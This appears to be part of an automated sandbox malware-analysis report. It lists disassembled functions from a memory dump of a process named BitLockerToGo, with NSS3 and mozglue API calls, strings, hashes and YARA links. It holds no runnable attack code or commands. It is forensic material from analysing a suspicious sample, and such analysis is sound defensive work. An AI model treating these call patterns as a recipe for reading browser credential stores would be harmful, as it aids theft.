                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750C9C
                                                                                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(?), ref: 6C750CD1
                                                                                                                                                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C750CEC
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750CFB
                                                                                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(00000000), ref: 6C750D16
                                                                                                                                                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C750D26
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750D35
                                                                                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(0000000A), ref: 6C750D65
                                                                                                                                                                                                                                                                                                                                                          • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C750D70
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750D7E
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C750D90
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C750D99
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - , xrefs: 6C750A5B
                                                                                                                                                                                                                                                                                                                                                          • %ld[%p]: , xrefs: 6C750A96
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: DebugOutputStringfflush$Timefwrite$Unothrow_t@std@@@__ehfuncinfo$??2@$R_snprintfSystem$CriticalCurrentEnterExplodeFileFlushR_vsmprintfR_vsnprintfSectionThreadfputcfreememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - $%ld[%p]:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3820836880-2800039365
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a68de58543dd80929dcda40f6fa3a9c1af7aef19423acca44e9135845fd3ea38
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d1404e823ced8ab576f5256397dc7659632db339aea5b62139f18c3d7fe4fe19
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a68de58543dd80929dcda40f6fa3a9c1af7aef19423acca44e9135845fd3ea38
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76A1E574A00294DFEF109F68DC89BEA3B78AF1331CF4806B4E80993261DF7599A5CB51
                                                                                                                                                                                                                                                                                                                                                          Function 6C716E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C62F9C9,?,6C62F4DA,6C62F9C9,?,?,6C5F369A), ref: 6C5CCA7A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C5CCB26
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?,?,6C5DBE66), ref: 6C716E81
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C5DBE66), ref: 6C716E98
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6C77AAF9,?,?,?,?,?,?,6C5DBE66), ref: 6C716EC9
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C5DBE66), ref: 6C716ED2
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C5DBE66), ref: 6C716EF8
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C5DBE66), ref: 6C716F1F
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C716F28
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C716F3D
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C5DBE66), ref: 6C716FA6
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6C77AAF9,00000000,?,?,?,?,?,?,?,6C5DBE66), ref: 6C716FDB
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C716FE4
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C716FEF
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C717014
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,6C5DBE66), ref: 6C71701D
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C5DBE66), ref: 6C717030
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C5DBE66), ref: 6C71705B
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C5DBE66), ref: 6C717079
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C717097
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C7170A0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                                                                                                                                                                                                                          • String ID: Pul$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 593473924-779637076
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: accfd20f053de519ffa379ea78fe5fded9e7487abce5f14655d5688df4cb1fa2
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: dc6b6cfaa8a525ad9a2696447921d938ada7dcb10f354c0fe54cc2fc81d0e597
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: accfd20f053de519ffa379ea78fe5fded9e7487abce5f14655d5688df4cb1fa2
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 235149B1B082119BE70056709D59FBB366ADBD2318F18463CE90596FC1FF25AA1E82D3
                                                                                                                                                                                                                                                                                                                                                          Function 6C6A4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6575C2,00000000,00000000,00000001), ref: 6C6A5009
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6575C2,00000000), ref: 6C6A5049
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6A505D
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C6A5071
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A5089
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A50A1
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C6A50B2
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6575C2), ref: 6C6A50CB
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6A50D9
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6A50F5
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A5103
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A511D
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A512B
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A5145
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A5153
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6A516D
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C6A517B
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6A5195
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
                                                                                                                                                                                                                                                                                                                                                          • String ID: config=$library=$name=$nss=$parameters=
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 391827415-203331871
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 76ec525bb30dc65bdf2c81a179c4f2996fd69617ed42fff8c975475bd2ce0d37
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6b3fbd3abdf98ba9b189338c2a76bb1b0772b896f34d5a1f1c1fe0dc2e52760f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76ec525bb30dc65bdf2c81a179c4f2996fd69617ed42fff8c975475bd2ce0d37
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3351D3B1A016056BEB00DF64DD45AAF77A8AF16348F140030EC15E7B41EB25ED1ACBBA
                                                                                                                                                                                                                                                                                                                                                          Function 6C6A4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C694F51,00000000), ref: 6C6A4C50
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C694F51,00000000), ref: 6C6A4C5B
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(6C77AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C694F51,00000000), ref: 6C6A4C76
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C694F51,00000000), ref: 6C6A4CAE
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A4CC9
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A4CF4
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A4D0B
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C694F51,00000000), ref: 6C6A4D5E
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C694F51,00000000), ref: 6C6A4D68
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C6A4D85
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C6A4DA2
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6A4DB9
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A4DCF
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 71b5486d44a9deed129eb7693620c3ab445280ac9064e461a8a1b941a1556648
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e46ac91977d54760d46cd3f30dd4d695dd9e87c58f4d3bd1697e2666505f1e2f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71b5486d44a9deed129eb7693620c3ab445280ac9064e461a8a1b941a1556648
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7841BEB19001456BEF126F649C44ABB3AB5AF82348F044134EC0A1B701EF75DD26C7EB
                                                                                                                                                                                                                                                                                                                                                          Function 6C686910 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 131COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C686943
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,BD5F5530,flags,?,00000000,?,6C685947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6C6A4220
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4210: NSSUTIL_ArgGetParamValue.NSS3(?,GYhl,?,?,?,?,?,?,00000000,?,00000000,?,6C687703,?,00000000,00000000), ref: 6C6A422D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C687703), ref: 6C6A424B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C687703,?,00000000), ref: 6C6A4272
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C686957
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C686972
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C686983
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A3EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6C67C79F,?,6C686247,70E85609,?,?,6C67C79F,6C68781D,?,6C67BD52,00000001,70E85609,D85D8B04,?), ref: 6C6A3EB8
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C6869AA
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C6869BE
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C6869D2
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C6869DF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,74F84C80,?,6C6A50B7,?), ref: 6C6A4041
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6869F6
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C686A04
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C686A1B
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6C686A29
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C686A3F
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C686A4D
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgStrip.NSS3(?), ref: 6C686A5B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2065226673-2785624044
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f853057569ae2deba2f3d953a5f18da274926215ebf7248cc9c54c409821c252
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 66871dfda10af0f12e1d63d68ec4f43d15ace5a4b3250cc3ff6ba940253ed9b6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f853057569ae2deba2f3d953a5f18da274926215ebf7248cc9c54c409821c252
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8741D4F1E512056BEB00DB74AD85BAB77ACAF1634CF040430E906E6B41FB35DA1987B9
                                                                                                                                                                                                                                                                                                                                                          Function 6C686CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C686943
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C686957
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C686972
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C686983
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C6869AA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C6869BE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C6869D2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C6869DF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C686A5B
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C686D8C
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C686DC5
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686DD6
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686DE7
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C686E1F
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C686E4B
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C686E72
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686EA7
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686EC4
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686ED5
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C686EE3
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686EF4
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686F08
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C686F35
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686F44
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686F5B
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C686F65
